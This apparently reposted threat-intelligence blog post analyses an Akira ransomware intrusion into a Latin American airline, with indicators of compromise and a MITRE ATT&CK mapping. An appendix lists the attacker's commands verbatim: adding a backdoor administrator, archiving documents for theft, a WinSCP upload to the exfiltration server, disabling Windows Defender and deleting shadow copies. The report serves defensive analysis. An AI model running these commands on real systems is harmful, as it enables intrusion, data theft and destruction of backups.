Thursday, July 11, 2024

Akira ransomware targets airline industry

 

Akira Ransomware Targets the LATAM Airline Industry

Summary

In June 2024, a threat group utilizing Akira ransomware was discovered targeting a Latin American airline. The threat actor initially accessed the network via Secure Shell (SSH) protocol and was successful in exfiltrating critical data before deploying a strain of the Akira ransomware the following day.

Throughout this compromise, a number of legitimate tools were abused in conjunction with Living off-the-Land Binaries and Scripts (LOLBAS). This enabled the assailants to perform reconnaissance and persist in the newly compromised victim environment.

Once the attacker had achieved their goal of exfiltrating data, the ransomware was deployed to encrypt and incapacitate the victim systems. Akira is a Ransomware-as-a-Service (RaaS) that has been a core weapon of Storm-1567 (aka Punk Spider and GOLD SAHARA), a prominent ransomware group first observed in 2023.  

Due to indicators that include DNS queries sent to a domain associated with Remmina—an open-source remote desktop client—we can say with a high degree of confidence that the threat actor behind this compromise is likely a Linux-based user.

In this blog, we’ll take a closer look at Akira’s attack chain.

What is Akira Ransomware?

Initially observed in the wild in March 2023, Akira is the ransomware associated with the RaaS group referred to as Storm-1567. The group is responsible for developing and maintaining Akira ransomware and the dedicated leak sites (DLS) associated with it.

The group typically employs a double-extortion tactic in which critical data is exfiltrated prior to the compromised victim systems being crippled by ransomware. This ploy puts added pressure on victims to pay the ransom, as the ransomware operators will threaten public exposure of the stolen confidential data if the payment is not delivered quickly.

Notable tactics, techniques and procedures (TTPs) associated with Akira ransomware include the frequent abuse of legitimate software, including open-source tools such as penetration testing software. The group is also known for exploiting vulnerabilities in a target organization's infrastructure, such as unpatched or out-of-date systems and vulnerable VPN software.

The Akira threat group has attacked numerous industry verticals spanning the globe in recent years. As of January 2024, the group has received more than $42 million in ransom payments and targeted over 250 different organizations. While the group primarily targets Windows systems, they also have Linux variants of their tools, including a variant targeting VMware ESXi virtual machines.

Under the Hood: Akira Attack Chain

Here is an overview of the Akira group’s two-day attack-chain on the compromised airline, as shown below:

Day 1:

Figure 1: Day 1 of Akira attack chain.

Day 2:

Figure 2: Day 2 of Akira attack chain.

Weaponization and Technical Analysis

Weapons

Ransomware, OpenSSH, NetScan, Advanced IP Scanner, AnyDesk

Attack Vector

Abuse of Valid Credentials

Network Infrastructure

SFTP

Targets

Airline, Transportation


Attack Vector

During this attack on a Latin American airline, we obtained endpoint detection and response (EDR) data to assist in our investigation. Logs of the initial compromise did not exist, but we observed that the attacker’s first visible access to Patient Zero was via SSH from a router’s IP address. SSH is a method for securely sending commands to a computer over an unsecured network, using cryptography to authenticate and encrypt connections between devices. Patient Zero was an unpatched Veeam backup server. We believe that the publicly available CVE-2023-27532 was used for initial access, which is a vulnerability in the Veeam Backup & Replication component.

The attack checks the boxes of previous Akira TTPs supplied by the FBI and the Cybersecurity and Infrastructure security Agency (CISA) in their April 2024 joint Cybersecurity Advisory on Akira ransomware. Akira operators have previously gained access to targets by utilizing CVE-2020-3259 and CVE-2023-20269.

Data Collection and Exfiltration

Once inside the network, the threat actor created a user named “backup” and added themselves to the Administrator group to gain a foothold in the environment.

Figure 3: User generated and added to admin group.

Next, the attacker proceeded to install the legitimate network management tool Advanced IP Scanner before scanning the local subnets discovered via "route print". Advanced IP Scanner is often considered a dual-use tool; through its operation can be critical for network administers and security professionals, the unexpected presence of the tool on a system could be a sign of internal malpractice or a red flag for other malicious activates.

During this particular attack, ownership of the Veeam backup data was taken via the Veeam backup folder, while the threat actor compressed and uploaded data from other systems. Common file types like documents, images and spreadsheets were included in this backup, in the hopes that confidential and potentially valuable data could be harvested and leveraged by the malicious actor for their own financial gain.

Figure 4: Obtaining file-types from victim device.

Finally, the data was exfiltrated via WinSCP, a free file manager for Windows.

Figure 5: Exfiltration of victim data to an actor-controlled server via WinSCP.

The total time from initial login to data exfiltration was just 133 minutes, with the last command being run at 4:55 PM UTC.

Path to Encryption

Starting early the next morning at 8:40 AM UTC, the threat actor’s work began again.

Logs that look identical to Impacket’s smbexec show that the attacker conducted user checks on a handful of machines before logging into the primary Veeam backup server.

Figure 6: Captured Logs.

Netscan was downloaded as “netscan.zip” using Google Chrome, and WinRAR was used to decompress it. Active directory connected machines were then identified and added to a file called “AdComputers.csv”.

While NetScan ran on the primary Veeam backup server, antivirus (AV) protection was disabled on the virtual machine host, both through antivirus user interfaces (UI) and through the command line.

Figure 7: Captured Logs.

Back on the primary Veeam backup server, file “win.zip” was then downloaded via Google Chrome and decompressed with WinRAR. It contained “w.exe”, which is Akira ransomware. W.exe was then copied to the VM host.

Hashes (md5, sha-256)

77a243cb73f6bdd610eeb10786b752fb

9b42decb7ea825b939fc36ab924e0c80324e0a4eccb4c371eac60a8672af9603

ITW File Name

w.exe

Compilation Stamp

Thu Dec 28 14:49:57 2023 | UTC

File Type/Signature

PE32+ executable (GUI) x86-64, for MS Windows

File Size

1029120

Compiler Name/Version

Microsoft Visual C/C++(19.36.32822)[LTCG/C++]


Users were enumerated using “net group” and were subsequently manipulated with the following:

Figure 8: Net User commands.

Once domain users had been taken care of, the legitimate remote desktop software AnyDesk was downloaded and run on five different systems. AnyDesk provides remote access to other devices running the application.

Figure 9: AnyDesk Configuration.

Now that persistence was fully in place, the threat actors attempted to deploy ransomware network-wide using the Veeam backup server as the control point. We saw the file “w.exe”—Akira ransomware—being deployed across various hosts from the compromised Veeam server.

Figure 10: Deployment of Akira ransomware.

At the same time, shadow copies were removed via PowerShell to make recovery from backup impossible:
powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"

Shadow Copy is a technology included in Windows used to create backup copies or snapshots of computer files or volumes. Ransomware (like Akira) will often attempt to remove these backup copies and any other backup services running on a device to prevent an easy restore after a ransomware attack. This puts further pressure on the victim to “pay up”, as backups and volumes that could potentially be reverted back to are now no longer a viable option.

Network Infrastructure

For this particular attack, endpoint logs did not capture the public IP address of the incoming SSH connection. It did, however, capture some of the outgoing traffic. DNS queries to the legitimate domain “plugins.remmina.org” imply that Remmina was being used by the threat actor for remote access capabilities. Remmina is an open-source remote desktop client which is not usable on Windows unless utilizing Windows Subsystem for Linux.

This suggests with a high degree of confidence that the threat actor behind this compromise and attack is likely a Linux-based user.

The IP address 77[.]247[.]126[.]158 was used for the exfiltration of data, and was still active at the time of writing this report.

Figure 11: Exfiltration of victim data via WinSCP.

Conclusions

Like most ransomware groups, Akira is a financially driven and motivated malicious gang who sell and leverage their malware purely for profit. As the Akira group operates as a RaaS, the victimology of the group varies, with its primary victims being small and medium-sized businesses (SMBs). They have also attacked some larger organizations based in North America and Europe.

The incident detailed in this report occurred over a period of two days, but fell within UTC working hours, with work by the threat actor stopping just before 5 PM UTC on the first day and resuming at 8:40 AM UTC on the second day. There is low to moderate confidence that the actors behind this attack are currently residing in or next to a UTC time zone. Western Europe has been host to many notorious threat actors this year, as evidenced by the recent arrest of a member of the infamous hacking group Scattered Spider.

Given this attack targeted a victim in Latin America (LATAM), it highlights the group’s willingness to target other regions, if any organization neglects to patch disclosed exploits utilized by the actor. It is worth noting that in this incident, internal software was also critically out-of-date, leaving major vulnerabilities that were exploited by the threat actor once the perimeter was breached.

Countermeasures

The good news is that BlackBerry customers are protected against the Akira IoCs listed in this blog by endpoint protection solutions such as CylanceENDPOINT™, powered by Cylance® AI from BlackBerry. CylanceENDPOINT leverages advanced AI to detect threats before they cause damage, minimizing business disruptions and the costs incurred during a ransomware attack.

For additional resources and tips on protecting your organization, we recommend reviewing the “Mitigations” section of the FBI and CISA joint Cybersecurity Advisory (released on April 18, 2024) on Akira ransomware.  
 

APPENDIX 1 – Indicators of Compromise (IoCs)

Tool

SHA256

NetScan

A8A7FDBBC688029C0D97BF836DA9ECE926A85E78986D0E1EBD9B3467B3A72258

Advanced IP Scanner

EC8252A333F68865160E26DC95607F2C49AF00F78C657F7F8417AB9D86E90BF7

WinRAR

4EBA4D465F8F5DF529F986F89C80B3AB93F6AB86A6DA236D7B129FC0228AF29A

5ACE2A64C9E3BA1911627DF1C335AF9800AA13064ABC4D7787B7C65B94958971

OpenSSH

6F31CF7A11189C683D8455180B4EE6A60781D2E3F3AADF3ECC86F578D480CFA9

AnyDesk

1CDAFBE519F60AAADB4A92E266FFF709129F86F0C9EE595C45499C66092E0499

WinSCP

026E8823B1885C0D58E48BDA8B0C4501710D181DCF603970CDBFB5782F18281D


APPENDIX 2 – Actor Commands

net user backup P@ssw0rd /add
net localgroup
net localgroup Administradores backup /add

quser

route print

takeown /f "<backup path here>" /r /d s
WinRAR.exe a -m4 -v3g -tn365d -n*.bmp -n*.doc -n*.docx -n*.xls -n*.xlsx -n*.pdf -n*.txt
    -hpcompanypass "\\<remote backup path>\Wallpapers\Sup\\Data.rar" "F:\<data folder>"

winscp.com /command "open sftp://datadatauser@77[.]247[.]126[.]158:37654"

net user <username> P@ssw0rd!91
net user <username> P@ssw0rd!91 /dom
net user <username> P@ssw0rd!91 /active:no /dom
net user <username> /del /dom
Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableArchiveScanning $true -DisableScriptScanning
$true -DisableBlockAtFirstSeen $true -DisableIOAVProtection $true -MAPSReporting Disabled -SubmitSamplesConsent 2
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\Windows\ /t reg_dword /d 0 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
/c Add-MpPreference -ExclusionPath C:\ProgramData, C:\Windows
sc config WinDefend start= disabled
sc stop WinDefend
Set-MpPreference -DisableRealtimeMonitoring True

powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject"


APPENDIX 3 – DETAILED MITRE ATT&CK® MAPPING

Tactic

Technique

Sub-Technique Name / Context

Resource Development

Obtain Capabilities: Tool – T1588.002

Use publicly-available tools: Advanced IP Scanner, Netscan.

Initial Access, Persistence

External Remote Services T1133

Use of SSH and RDP.

Initial Access, Persistence

Valid Accounts T1078

 

Initial Access

Exploit Public-Facing Application - T1190

Potential exploitation of Veeam backup server vulnerabilities: CVE-2023-27532, CVE-2020-3259 and CVE-2023-20269.

Execution

Command and Scripting Interpreter: PowerShell Execution – T1059.001

Utilizes the Get-LocalUser cmdlet to display information about local user accounts and to delete shadow copies.

Execution

Windows Management Instrumentation – T1047

Utilizes the “Win32_Shadhowcopy” WMI Class to retrieve information about shadows copies.

Execution

User Execution: Malicious File – T1204.001

Executes Akira ransomware on victim’s machine.

Persistence

Create Account: Domain Account T1136.002

Create “backup” account.

Persistence

Create Account: Local Account T1136.001

Create “backup” account.

Privilege Escalation

Account Manipulation - T1098

Add backup user to the Administrators group.

Defense Evasion

Disable or Modify Tools T1562.001

Disable MSDefender, Access local AV UI.

Defense Evasion

File and Directory Permissions Modification: Windows File and Directory Permissions Modification – T1222.001

Takes ownership of the backup directory and its contents.

Defense Evasion

Modify Registry – T1112

Disable Microsoft Defender by modifying the registry key.

Discovery

Domain Trust Discovery T1482

Netscan

Discovery

Remote System Discovery T1018

Advanced IP Scanner, Netscan.

Discovery

System Network Configuration Discovery T1016

Advanced IP Scanner, Netscan.

Discovery

Permission Groups Discovery: Local Groups - T1069

Net localgroup

Discovery

File and Directory Discovery – T1083

Enumerates content of the “ProgramData” folder.

Discovery

Account Discovery: Local Account Discovery – T1087.001

Discover Local Account information using Get-LocalUser.

Lateral Movement

Remote Desktop Protocol T1021.001

Accessing RDP via Remmina.

Lateral Movement

SMB/Windows Admin Shares T1021.002

SMBExec

Lateral Movement

SSH T1021.004

 

Lateral Movement

Lateral Tool Transfer – T1570

Deploys ransomware on various hosts.

Collection

Archive via Utility T1560.001

WinRAR

Command and Control

Ingress Tool Transfer – T1105

Downloads Akira ransomware from an external source into the compromised environment.

Command and Control

Remote Access Software – T1219

Installs legitimate utility AnyDesk on different systems.

Exfiltration

Exfiltration Over Alternative Protocol T1048

WinSCP/SFTP

Exfiltration

Transfer Data to Cloud Account T1537

AnyDesk

Impact

Account Access Removal T1531

Removal of user accounts.

Impact

Data Encryption for Impact T1486

Encrypt data using Akira ransomware.

Impact

Inhibit System Recovery T1490

Delete Shadow files.

Impact

Service Stop – T1489

Stops WinDefend service.

No comments:

Post a Comment

Telegram founder arrested

  Aug 25, 2024  Ravie Lakshmanan Pavel Durov, founder and chief executive of the popular messaging app Telegram, was arrested in France on ...